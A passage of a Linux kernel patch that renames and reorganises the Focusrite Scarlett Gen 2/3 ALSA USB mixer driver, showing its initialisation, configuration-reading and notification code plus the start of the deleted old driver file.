++		struct usb_endpoint_descriptor *epd;
++
++		if (desc->bInterfaceClass != 255)
++			continue;
++
++		epd = get_endpoint(intf->altsetting, 0);
++		private->bInterfaceNumber = desc->bInterfaceNumber;
++		private->bEndpointAddress = epd->bEndpointAddress &
++			USB_ENDPOINT_NUMBER_MASK;
++		private->wMaxPacketSize = le16_to_cpu(epd->wMaxPacketSize);
++		private->bInterval = epd->bInterval;
++		return 0;
++	}
++
++	return -EINVAL;
++}
++
++/* Initialise private data */
++static int scarlett2_init_private(struct usb_mixer_interface *mixer,
++				  const struct scarlett2_device_entry *entry)
++{
++	struct scarlett2_data *private =
++		kzalloc(sizeof(struct scarlett2_data), GFP_KERNEL);
++
++	if (!private)
++		return -ENOMEM;
++
++	mutex_init(&private->usb_mutex);
++	mutex_init(&private->data_mutex);
++	INIT_DELAYED_WORK(&private->work, scarlett2_config_save_work);
++
++	mixer->private_data = private;
++	mixer->private_free = scarlett2_private_free;
++	mixer->private_suspend = scarlett2_private_suspend;
++
++	private->info = entry->info;
++	private->series_name = entry->series_name;
++	scarlett2_count_mux_io(private);
++	private->scarlett2_seq = 0;
++	private->mixer = mixer;
++
++	return scarlett2_find_fc_interface(mixer->chip->dev, private);
++}
++
++/* Cargo cult proprietary initialisation sequence */
++static int scarlett2_usb_init(struct usb_mixer_interface *mixer)
++{
++	struct usb_device *dev = mixer->chip->dev;
++	struct scarlett2_data *private = mixer->private_data;
++	u8 buf[24];
++	int err;
++
++	if (usb_pipe_type_check(dev, usb_sndctrlpipe(dev, 0)))
++		return -EINVAL;
++
++	/* step 0 */
++	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
++			       SCARLETT2_USB_CMD_INIT, buf, sizeof(buf));
++	if (err < 0)
++		return err;
++
++	/* step 1 */
++	private->scarlett2_seq = 1;
++	err = scarlett2_usb(mixer, SCARLETT2_USB_INIT_1, NULL, 0, NULL, 0);
++	if (err < 0)
++		return err;
++
++	/* step 2 */
++	private->scarlett2_seq = 1;
++	return scarlett2_usb(mixer, SCARLETT2_USB_INIT_2, NULL, 0, NULL, 84);
++}
++
++/* Read configuration from the interface on start */
++static int scarlett2_read_configs(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int num_mixer_out =
++		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++	struct scarlett2_usb_volume_status volume_status;
++	int err, i;
++
++	if (info->has_msd_mode) {
++		err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_MSD_SWITCH,
++			1, &private->msd_switch);
++		if (err < 0)
++			return err;
++
++		/* no other controls are created if MSD mode is on */
++		if (private->msd_switch)
++			return 0;
++	}
++
++	err = scarlett2_update_input_other(mixer);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_update_monitor_other(mixer);
++	if (err < 0)
++		return err;
++
++	/* the rest of the configuration is for devices with a mixer */
++	if (info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	err = scarlett2_usb_get_config(
++		mixer, SCARLETT2_CONFIG_STANDALONE_SWITCH,
++		1, &private->standalone_switch);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_update_sync(mixer);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
++	if (err < 0)
++		return err;
++
++	if (info->line_out_hw_vol)
++		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
++			private->dim_mute[i] = !!volume_status.dim_mute[i];
++
++	private->master_vol = clamp(
++		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
++		0, SCARLETT2_VOLUME_BIAS);
++
++	for (i = 0; i < num_line_out; i++) {
++		int volume, mute;
++
++		private->vol_sw_hw_switch[i] =
++			info->line_out_hw_vol
++				&& volume_status.sw_hw_switch[i];
++
++		volume = private->vol_sw_hw_switch[i]
++			   ? volume_status.master_vol
++			   : volume_status.sw_vol[i];
++		volume = clamp(volume + SCARLETT2_VOLUME_BIAS,
++			       0, SCARLETT2_VOLUME_BIAS);
++		private->vol[i] = volume;
++
++		mute = private->vol_sw_hw_switch[i]
++			 ? private->dim_mute[SCARLETT2_BUTTON_MUTE]
++			 : volume_status.mute_switch[i];
++		private->mute_switch[i] = mute;
++	}
++
++	for (i = 0; i < num_mixer_out; i++) {
++		err = scarlett2_usb_get_mix(mixer, i);
++		if (err < 0)
++			return err;
++	}
++
++	return scarlett2_usb_get_mux(mixer);
++}
++
++/* Notify on sync change */
++static void scarlett2_notify_sync(
++	struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	private->sync_updated = 1;
++
++	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
++		       &private->sync_ctl->id);
++}
++
++/* Notify on monitor change */
++static void scarlett2_notify_monitor(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int i;
++
++	/* if line_out_hw_vol is 0, there are no controls to update */
++	if (!info->line_out_hw_vol)
++		return;
++
++	private->vol_updated = 1;
++
++	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
++		       &private->master_vol_ctl->id);
++
++	for (i = 0; i < num_line_out; i++)
++		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
++			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++				       &private->vol_ctls[i]->id);
++}
++
++/* Notify on dim/mute change */
++static void scarlett2_notify_dim_mute(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int i;
++
++	private->vol_updated = 1;
++
++	if (!info->line_out_hw_vol)
++		return;
++
++	for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->dim_mute_ctls[i]->id);
++
++	for (i = 0; i < num_line_out; i++)
++		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
++			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++				       &private->mute_ctls[i]->id);
++}
++
++/* Notify on "input other" change (level/pad/air) */
++static void scarlett2_notify_input_other(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	int i;
++
++	private->input_other_updated = 1;
++
++	for (i = 0; i < info->level_input_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->level_ctls[i]->id);
++	for (i = 0; i < info->pad_input_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->pad_ctls[i]->id);
++	for (i = 0; i < info->air_input_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->air_ctls[i]->id);
++	for (i = 0; i < info->phantom_count; i++)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->phantom_ctls[i]->id);
++}
++
++/* Notify on "monitor other" change (direct monitor, speaker
++ * switching, talkback)
++ */
++static void scarlett2_notify_monitor_other(
++	struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	private->monitor_other_updated = 1;
++
++	if (info->direct_monitor) {
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->direct_monitor_ctl->id);
++		return;
++	}
++
++	if (info->has_speaker_switching)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->speaker_switching_ctl->id);
++
++	if (info->has_talkback)
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++			       &private->talkback_ctl->id);
++
++	/* if speaker switching was recently enabled or disabled,
++	 * invalidate the dim/mute and mux enum controls
++	 */
++	if (private->speaker_switching_switched) {
++		int i;
++
++		scarlett2_notify_dim_mute(mixer);
++
++		private->speaker_switching_switched = 0;
++		private->mux_updated = 1;
++
++		for (i = 0; i < private->num_mux_dsts; i++)
++			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
++				       &private->mux_ctls[i]->id);
++	}
++}
++
++/* Interrupt callback */
++static void scarlett2_notify(struct urb *urb)
++{
++	struct usb_mixer_interface *mixer = urb->context;
++	int len = urb->actual_length;
++	int ustatus = urb->status;
++	u32 data;
++
++	if (ustatus != 0 || len != 8)
++		goto requeue;
++
++	data = le32_to_cpu(*(__le32 *)urb->transfer_buffer);
++	if (data & SCARLETT2_USB_NOTIFY_SYNC)
++		scarlett2_notify_sync(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_MONITOR)
++		scarlett2_notify_monitor(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_DIM_MUTE)
++		scarlett2_notify_dim_mute(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_INPUT_OTHER)
++		scarlett2_notify_input_other(mixer);
++	if (data & SCARLETT2_USB_NOTIFY_MONITOR_OTHER)
++		scarlett2_notify_monitor_other(mixer);
++
++requeue:
++	if (ustatus != -ENOENT &&
++	    ustatus != -ECONNRESET &&
++	    ustatus != -ESHUTDOWN) {
++		urb->dev = mixer->chip->dev;
++		usb_submit_urb(urb, GFP_ATOMIC);
++	}
++}
++
++static int scarlett2_init_notify(struct usb_mixer_interface *mixer)
++{
++	struct usb_device *dev = mixer->chip->dev;
++	struct scarlett2_data *private = mixer->private_data;
++	unsigned int pipe = usb_rcvintpipe(dev, private->bEndpointAddress);
++	void *transfer_buffer;
++
++	if (mixer->urb) {
++		usb_audio_err(mixer->chip,
++			      "%s: mixer urb already in use!\n", __func__);
++		return 0;
++	}
++
++	if (usb_pipe_type_check(dev, pipe))
++		return -EINVAL;
++
++	mixer->urb = usb_alloc_urb(0, GFP_KERNEL);
++	if (!mixer->urb)
++		return -ENOMEM;
++
++	transfer_buffer = kmalloc(private->wMaxPacketSize, GFP_KERNEL);
++	if (!transfer_buffer)
++		return -ENOMEM;
++
++	usb_fill_int_urb(mixer->urb, dev, pipe,
++			 transfer_buffer, private->wMaxPacketSize,
++			 scarlett2_notify, mixer, private->bInterval);
++
++	return usb_submit_urb(mixer->urb, GFP_KERNEL);
++}
++
++static const struct scarlett2_device_entry *get_scarlett2_device_entry(
++	struct usb_mixer_interface *mixer)
++{
++	const struct scarlett2_device_entry *entry = scarlett2_devices;
++
++	/* Find entry in scarlett2_devices */
++	while (entry->usb_id && entry->usb_id != mixer->chip->usb_id)
++		entry++;
++	if (!entry->usb_id)
++		return NULL;
++
++	return entry;
++}
++
++static int snd_scarlett2_controls_create(
++	struct usb_mixer_interface *mixer,
++	const struct scarlett2_device_entry *entry)
++{
++	int err;
++
++	/* Initialise private data */
++	err = scarlett2_init_private(mixer, entry);
++	if (err < 0)
++		return err;
++
++	/* Send proprietary USB initialisation sequence */
++	err = scarlett2_usb_init(mixer);
++	if (err < 0)
++		return err;
++
++	/* Read volume levels and controls from the interface */
++	err = scarlett2_read_configs(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the MSD control */
++	err = scarlett2_add_msd_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* If MSD mode is enabled, don't create any other controls */
++	if (((struct scarlett2_data *)mixer->private_data)->msd_switch)
++		return 0;
++
++	/* Create the analogue output controls */
++	err = scarlett2_add_line_out_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the analogue input controls */
++	err = scarlett2_add_line_in_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the input, output, and mixer mux input selections */
++	err = scarlett2_add_mux_enums(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the matrix mixer controls */
++	err = scarlett2_add_mixer_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the level meter controls */
++	err = scarlett2_add_meter_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the sync control */
++	err = scarlett2_add_sync_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the direct monitor control */
++	err = scarlett2_add_direct_monitor_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the speaker switching control */
++	err = scarlett2_add_speaker_switch_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the talkback controls */
++	err = scarlett2_add_talkback_ctls(mixer);
++	if (err < 0)
++		return err;
++
++	/* Create the standalone control */
++	err = scarlett2_add_standalone_ctl(mixer);
++	if (err < 0)
++		return err;
++
++	/* Set up the interrupt polling */
++	err = scarlett2_init_notify(mixer);
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++
++int snd_scarlett2_init(struct usb_mixer_interface *mixer)
++{
++	struct snd_usb_audio *chip = mixer->chip;
++	const struct scarlett2_device_entry *entry;
++	int err;
++
++	/* only use UAC_VERSION_2 */
++	if (!mixer->protocol)
++		return 0;
++
++	/* find entry in scarlett2_devices */
++	entry = get_scarlett2_device_entry(mixer);
++	if (!entry) {
++		usb_audio_err(mixer->chip,
++			      "%s: missing device entry for %04x:%04x\n",
++			      __func__,
++			      USB_ID_VENDOR(chip->usb_id),
++			      USB_ID_PRODUCT(chip->usb_id));
++		return 0;
++	}
++
++	if (chip->setup & SCARLETT2_DISABLE) {
++		usb_audio_info(chip,
++			"Focusrite %s Mixer Driver disabled "
++			"by modprobe options (snd_usb_audio "
++			"vid=0x%04x pid=0x%04x device_setup=%d)\n",
++			entry->series_name,
++			USB_ID_VENDOR(chip->usb_id),
++			USB_ID_PRODUCT(chip->usb_id),
++			SCARLETT2_DISABLE);
++		return 0;
++	}
++
++	usb_audio_info(chip,
++		"Focusrite %s Mixer Driver enabled (pid=0x%04x); "
++		"report any issues to g@b4.vu",
++		entry->series_name,
++		USB_ID_PRODUCT(chip->usb_id));
++
++	err = snd_scarlett2_controls_create(mixer, entry);
++	if (err < 0)
++		usb_audio_err(mixer->chip,
++			      "Error initialising %s Mixer Driver: %d",
++			      entry->series_name,
++			      err);
++
++	return err;
++}
+diff --git a/sound/usb/mixer_scarlett2.h b/sound/usb/mixer_scarlett2.h
+new file mode 100644
+index 0000000000000..d209362cf41a6
+--- /dev/null
++++ b/sound/usb/mixer_scarlett2.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __USB_MIXER_SCARLETT2_H
++#define __USB_MIXER_SCARLETT2_H
++
++int snd_scarlett2_init(struct usb_mixer_interface *mixer);
++
++#endif /* __USB_MIXER_SCARLETT2_H */
+diff --git a/sound/usb/mixer_scarlett_gen2.c b/sound/usb/mixer_scarlett_gen2.c
+deleted file mode 100644
+index 1bcb05c73e0ad..0000000000000
+--- a/sound/usb/mixer_scarlett_gen2.c
++++ /dev/null
+@@ -1,4274 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *   Focusrite Scarlett Gen 2/3 and Clarett+ Driver for ALSA
+- *
+- *   Supported models:
+- *   - 6i6/18i8/18i20 Gen 2
+- *   - Solo/2i2/4i4/8i6/18i8/18i20 Gen 3
+- *   - Clarett+ 8Pre
+- *
+- *   Copyright (c) 2018-2022 by Geoffrey D. Bennett <g at b4.vu>
+- *   Copyright (c) 2020-2021 by Vladimir Sadovnikov <sadko4u@gmail.com>
+- *   Copyright (c) 2022 by Christian Colglazier <christian@cacolglazier.com>
+- *
+- *   Based on the Scarlett (Gen 1) Driver for ALSA:
+- *
+- *   Copyright (c) 2013 by Tobias Hoffmann
+- *   Copyright (c) 2013 by Robin Gareus <robin at gareus.org>
+- *   Copyright (c) 2002 by Takashi Iwai <tiwai at suse.de>
+- *   Copyright (c) 2014 by Chris J Arges <chris.j.arges at canonical.com>
+- *
+- *   Many codes borrowed from audio.c by
+- *     Alan Cox (alan at lxorguk.ukuu.org.uk)
+- *     Thomas Sailer (sailer at ife.ee.ethz.ch)
+- *
+- *   Code cleanup:
+- *   David Henningsson <david.henningsson at canonical.com>
+- */
+-
+-/* The protocol was reverse engineered by looking at the communication
+- * between Focusrite Control 2.3.4 and the Focusrite(R) Scarlett 18i20
+- * (firmware 1083) using usbmon in July-August 2018.
+- *
+- * Scarlett 18i8 support added in April 2019.
+- *
+- * Scarlett 6i6 support added in June 2019 (thanks to Martin Wittmann
+- * for providing usbmon output and testing).
+- *
+- * Scarlett 4i4/8i6 Gen 3 support added in May 2020 (thanks to Laurent
+- * Debricon for donating a 4i4 and to Fredrik Unger for providing 8i6
+- * usbmon output and testing).
+- *
+- * Scarlett 18i8/18i20 Gen 3 support added in June 2020 (thanks to
+- * Darren Jaeckel, Alex Sedlack, and Clovis Lunel for providing usbmon
+- * output, protocol traces and testing).
+- *
+- * Support for loading mixer volume and mux configuration from the
+- * interface during driver initialisation added in May 2021 (thanks to
+- * Vladimir Sadovnikov for figuring out how).
+- *
+- * Support for Solo/2i2 Gen 3 added in May 2021 (thanks to Alexander
+- * Vorona for 2i2 protocol traces).
+- *
+- * Support for phantom power, direct monitoring, speaker switching,
+- * and talkback added in May-June 2021.
+- *
+- * Support for Clarett+ 8Pre added in Aug 2022 by Christian
+- * Colglazier.
+- *
+- * This ALSA mixer gives access to (model-dependent):
+- *  - input, output, mixer-matrix muxes
+- *  - mixer-matrix gain stages
+- *  - gain/volume/mute controls
+- *  - level meters
+- *  - line/inst level, pad, and air controls
+- *  - phantom power, direct monitor, speaker switching, and talkback
+- *    controls
+- *  - disable/enable MSD mode
+- *  - disable/enable standalone mode
+- *
+- * <ditaa>
+- *    /--------------\    18chn            20chn     /--------------\
+- *    | Hardware  in +--+------\    /-------------+--+ ALSA PCM out |
+- *    \--------------/  |      |    |             |  \--------------/
+- *                      |      |    |    /-----\  |
+- *                      |      |    |    |     |  |
+- *                      |      v    v    v     |  |
+- *                      |   +---------------+  |  |
+- *                      |    \ Matrix  Mux /   |  |
+- *                      |     +-----+-----+    |  |
+- *                      |           |          |  |
+- *                      |           |18chn     |  |
+- *                      |           |          |  |
+- *                      |           |     10chn|  |
+- *                      |           v          |  |
+- *                      |     +------------+   |  |
+- *                      |     | Mixer      |   |  |
+- *                      |     |     Matrix |   |  |
+- *                      |     |            |   |  |
+- *                      |     | 18x10 Gain |   |  |
+- *                      |     |   stages   |   |  |
+- *                      |     +-----+------+   |  |
+- *                      |           |          |  |
+- *                      |18chn      |10chn     |  |20chn
+- *                      |           |          |  |
+- *                      |           +----------/  |
+- *                      |           |             |
+- *                      v           v             v
+- *                      ===========================
+- *               +---------------+       +--—------------+
+- *                \ Output  Mux /         \ Capture Mux /
+- *                 +---+---+---+           +-----+-----+
+- *                     |   |                     |
+- *                10chn|   |                     |18chn
+- *                     |   |                     |
+- *  /--------------\   |   |                     |   /--------------\
+- *  | S/PDIF, ADAT |<--/   |10chn                \-->| ALSA PCM in  |
+- *  | Hardware out |       |                         \--------------/
+- *  \--------------/       |
+- *                         v
+- *                  +-------------+    Software gain per channel.
+- *                  | Master Gain |<-- 18i20 only: Switch per channel
+- *                  +------+------+    to select HW or SW gain control.
+- *                         |
+- *                         |10chn
+- *  /--------------\       |
+- *  | Analogue     |<------/
+- *  | Hardware out |
+- *  \--------------/
+- * </ditaa>
+- *
+- * Gen 3 devices have a Mass Storage Device (MSD) mode where a small
+- * disk with registration and driver download information is presented
+- * to the host. To access the full functionality of the device without
+- * proprietary software, MSD mode can be disabled by:
+- * - holding down the 48V button for five seconds while powering on
+- *   the device, or
+- * - using this driver and alsamixer to change the "MSD Mode" setting
+- *   to Off and power-cycling the device
+- */
+-
+-#include <linux/slab.h>
+-#include <linux/usb.h>
+-#include <linux/moduleparam.h>
+-
+-#include <sound/control.h>
+-#include <sound/tlv.h>
+-
+-#include "usbaudio.h"
+-#include "mixer.h"
+-#include "helper.h"
+-
+-#include "mixer_scarlett_gen2.h"
+-
+-/* device_setup value to enable */
+-#define SCARLETT2_ENABLE 0x01
+-
+-/* device_setup value to allow turning MSD mode back on */
+-#define SCARLETT2_MSD_ENABLE 0x02
+-
+-/* some gui mixers can't handle negative ctl values */
+-#define SCARLETT2_VOLUME_BIAS 127
+-
+-/* mixer range from -80dB to +6dB in 0.5dB steps */
+-#define SCARLETT2_MIXER_MIN_DB -80
+-#define SCARLETT2_MIXER_BIAS (-SCARLETT2_MIXER_MIN_DB * 2)
+-#define SCARLETT2_MIXER_MAX_DB 6
+-#define SCARLETT2_MIXER_MAX_VALUE \
+-	((SCARLETT2_MIXER_MAX_DB - SCARLETT2_MIXER_MIN_DB) * 2)
+-#define SCARLETT2_MIXER_VALUE_COUNT (SCARLETT2_MIXER_MAX_VALUE + 1)
+-
+-/* map from (dB + 80) * 2 to mixer value
+- * for dB in 0 .. 172: int(8192 * pow(10, ((dB - 160) / 2 / 20)))
+- */
+-static const u16 scarlett2_mixer_values[SCARLETT2_MIXER_VALUE_COUNT] = {
+-	0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2,
+-	2, 2, 3, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 8, 8,
+-	9, 9, 10, 10, 11, 12, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
+-	23, 24, 25, 27, 29, 30, 32, 34, 36, 38, 41, 43, 46, 48, 51,
+-	54, 57, 61, 65, 68, 73, 77, 81, 86, 91, 97, 103, 109, 115,
+-	122, 129, 137, 145, 154, 163, 173, 183, 194, 205, 217, 230,
+-	244, 259, 274, 290, 307, 326, 345, 365, 387, 410, 434, 460,
+-	487, 516, 547, 579, 614, 650, 689, 730, 773, 819, 867, 919,
+-	973, 1031, 1092, 1157, 1225, 1298, 1375, 1456, 1543, 1634,
+-	1731, 1833, 1942, 2057, 2179, 2308, 2445, 2590, 2744, 2906,
+-	3078, 3261, 3454, 3659, 3876, 4105, 4349, 4606, 4879, 5168,
+-	5475, 5799, 6143, 6507, 6892, 7301, 7733, 8192, 8677, 9191,
+-	9736, 10313, 10924, 11571, 12257, 12983, 13752, 14567, 15430,
+-	16345
+-};
+-
+-/* Maximum number of analogue outputs */
+-#define SCARLETT2_ANALOGUE_MAX 10
+-
+-/* Maximum number of level and pad switches */
+-#define SCARLETT2_LEVEL_SWITCH_MAX 2
+-#define SCARLETT2_PAD_SWITCH_MAX 8
+-#define SCARLETT2_AIR_SWITCH_MAX 8
+-#define SCARLETT2_PHANTOM_SWITCH_MAX 2
+-
+-/* Maximum number of inputs to the mixer */
+-#define SCARLETT2_INPUT_MIX_MAX 25
+-
+-/* Maximum number of outputs from the mixer */
+-#define SCARLETT2_OUTPUT_MIX_MAX 12
+-
+-/* Maximum size of the data in the USB mux assignment message:
+- * 20 inputs, 20 outputs, 25 matrix inputs, 12 spare
+- */
+-#define SCARLETT2_MUX_MAX 77
+-
+-/* Maximum number of meters (sum of output port counts) */
+-#define SCARLETT2_MAX_METERS 65
+-
+-/* There are three different sets of configuration parameters across
+- * the devices
+- */
+-enum {
+-	SCARLETT2_CONFIG_SET_NO_MIXER = 0,
+-	SCARLETT2_CONFIG_SET_GEN_2 = 1,
+-	SCARLETT2_CONFIG_SET_GEN_3 = 2,
+-	SCARLETT2_CONFIG_SET_CLARETT = 3,
+-	SCARLETT2_CONFIG_SET_COUNT = 4
+-};
+-
+-/* Hardware port types:
+- * - None (no input to mux)
+- * - Analogue I/O
+- * - S/PDIF I/O
+- * - ADAT I/O
+- * - Mixer I/O
+- * - PCM I/O
+- */
+-enum {
+-	SCARLETT2_PORT_TYPE_NONE     = 0,
+-	SCARLETT2_PORT_TYPE_ANALOGUE = 1,
+-	SCARLETT2_PORT_TYPE_SPDIF    = 2,
+-	SCARLETT2_PORT_TYPE_ADAT     = 3,
+-	SCARLETT2_PORT_TYPE_MIX      = 4,
+-	SCARLETT2_PORT_TYPE_PCM      = 5,
+-	SCARLETT2_PORT_TYPE_COUNT    = 6,
+-};
+-
+-/* I/O count of each port type kept in struct scarlett2_ports */
+-enum {
+-	SCARLETT2_PORT_IN    = 0,
+-	SCARLETT2_PORT_OUT   = 1,
+-	SCARLETT2_PORT_DIRNS = 2,
+-};
+-
+-/* Dim/Mute buttons on the 18i20 */
+-enum {
+-	SCARLETT2_BUTTON_MUTE    = 0,
+-	SCARLETT2_BUTTON_DIM     = 1,
+-	SCARLETT2_DIM_MUTE_COUNT = 2,
+-};
+-
+-static const char *const scarlett2_dim_mute_names[SCARLETT2_DIM_MUTE_COUNT] = {
+-	"Mute Playback Switch", "Dim Playback Switch"
+-};
+-
+-/* Description of each hardware port type:
+- * - id: hardware ID of this port type
+- * - src_descr: printf format string for mux input selections
+- * - src_num_offset: added to channel number for the fprintf
+- * - dst_descr: printf format string for mixer controls
+- */
+-struct scarlett2_port {
+-	u16 id;
+-	const char * const src_descr;
+-	int src_num_offset;
+-	const char * const dst_descr;
+-};
+-
+-static const struct scarlett2_port scarlett2_ports[SCARLETT2_PORT_TYPE_COUNT] = {
+-	[SCARLETT2_PORT_TYPE_NONE] = {
+-		.id = 0x000,
+-		.src_descr = "Off"
+-	},
+-	[SCARLETT2_PORT_TYPE_ANALOGUE] = {
+-		.id = 0x080,
+-		.src_descr = "Analogue %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "Analogue Output %02d Playback"
+-	},
+-	[SCARLETT2_PORT_TYPE_SPDIF] = {
+-		.id = 0x180,
+-		.src_descr = "S/PDIF %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "S/PDIF Output %d Playback"
+-	},
+-	[SCARLETT2_PORT_TYPE_ADAT] = {
+-		.id = 0x200,
+-		.src_descr = "ADAT %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "ADAT Output %d Playback"
+-	},
+-	[SCARLETT2_PORT_TYPE_MIX] = {
+-		.id = 0x300,
+-		.src_descr = "Mix %c",
+-		.src_num_offset = 'A',
+-		.dst_descr = "Mixer Input %02d Capture"
+-	},
+-	[SCARLETT2_PORT_TYPE_PCM] = {
+-		.id = 0x600,
+-		.src_descr = "PCM %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "PCM %02d Capture"
+-	},
+-};
+-
+-/* Number of mux tables: one for each band of sample rates
+- * (44.1/48kHz, 88.2/96kHz, and 176.4/176kHz)
+- */
+-#define SCARLETT2_MUX_TABLES 3
+-
+-/* Maximum number of entries in a mux table */
+-#define SCARLETT2_MAX_MUX_ENTRIES 10
+-
+-/* One entry within mux_assignment defines the port type and range of
+- * ports to add to the set_mux message. The end of the list is marked
+- * with count == 0.
+- */
+-struct scarlett2_mux_entry {
+-	u8 port_type;
+-	u8 start;
+-	u8 count;
+-};
+-
+-struct scarlett2_device_info {
+-	u32 usb_id; /* USB device identifier */
+-
+-	/* Gen 3 devices have an internal MSD mode switch that needs
+-	 * to be disabled in order to access the full functionality of
+-	 * the device.
+-	 */
+-	u8 has_msd_mode;
+-
+-	/* which set of configuration parameters the device uses */
+-	u8 config_set;
+-
+-	/* line out hw volume is sw controlled */
+-	u8 line_out_hw_vol;
+-
+-	/* support for main/alt speaker switching */
+-	u8 has_speaker_switching;
+-
+-	/* support for talkback microphone */
+-	u8 has_talkback;
+-
+-	/* the number of analogue inputs with a software switchable
+-	 * level control that can be set to line or instrument
+-	 */
+-	u8 level_input_count;
+-
+-	/* the first input with a level control (0-based) */
+-	u8 level_input_first;
+-
+-	/* the number of analogue inputs with a software switchable
+-	 * 10dB pad control
+-	 */
+-	u8 pad_input_count;
+-
+-	/* the number of analogue inputs with a software switchable
+-	 * "air" control
+-	 */
+-	u8 air_input_count;
+-
+-	/* the number of phantom (48V) software switchable controls */
+-	u8 phantom_count;
+-
+-	/* the number of inputs each phantom switch controls */
+-	u8 inputs_per_phantom;
+-
+-	/* the number of direct monitor options
+-	 * (0 = none, 1 = mono only, 2 = mono/stereo)
+-	 */
+-	u8 direct_monitor;
+-
+-	/* remap analogue outputs; 18i8 Gen 3 has "line 3/4" connected
+-	 * internally to the analogue 7/8 outputs
+-	 */
+-	u8 line_out_remap_enable;
+-	u8 line_out_remap[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* additional description for the line out volume controls */
+-	const char * const line_out_descrs[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* number of sources/destinations of each port type */
+-	const int port_count[SCARLETT2_PORT_TYPE_COUNT][SCARLETT2_PORT_DIRNS];
+-
+-	/* layout/order of the entries in the set_mux message */
+-	struct scarlett2_mux_entry mux_assignment[SCARLETT2_MUX_TABLES]
+-						 [SCARLETT2_MAX_MUX_ENTRIES];
+-};
+-
+-struct scarlett2_data {
+-	struct usb_mixer_interface *mixer;
+-	struct mutex usb_mutex; /* prevent sending concurrent USB requests */
+-	struct mutex data_mutex; /* lock access to this data */
+-	struct delayed_work work;
+-	const struct scarlett2_device_info *info;
+-	__u8 bInterfaceNumber;
+-	__u8 bEndpointAddress;
+-	__u16 wMaxPacketSize;
+-	__u8 bInterval;
+-	int num_mux_srcs;
+-	int num_mux_dsts;
